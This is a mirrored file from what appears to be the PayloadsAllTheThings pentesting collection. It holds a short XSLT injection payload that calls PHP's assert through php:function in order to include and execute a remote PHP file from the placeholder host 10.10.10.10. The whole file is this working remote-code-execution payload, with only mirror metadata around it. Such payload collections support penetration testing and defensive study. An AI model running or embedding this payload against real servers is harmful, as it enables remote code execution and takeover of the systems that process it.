mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 10:26:09 +00:00
9 lines
409 B
XML
9 lines
409 B
XML
<?xml version="1.0" encoding="UTF-8"?>
|
|
<html xsl:version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">
|
|
<body style="font-family:Arial;font-size:12pt;background-color:#EEEEEE">
|
|
<xsl:variable name="payload">
|
|
include("http://10.10.10.10/test.php")
|
|
</xsl:variable>
|
|
<xsl:variable name="include" select="php:function('assert',$payload)"/>
|
|
</body>
|
|
</html> |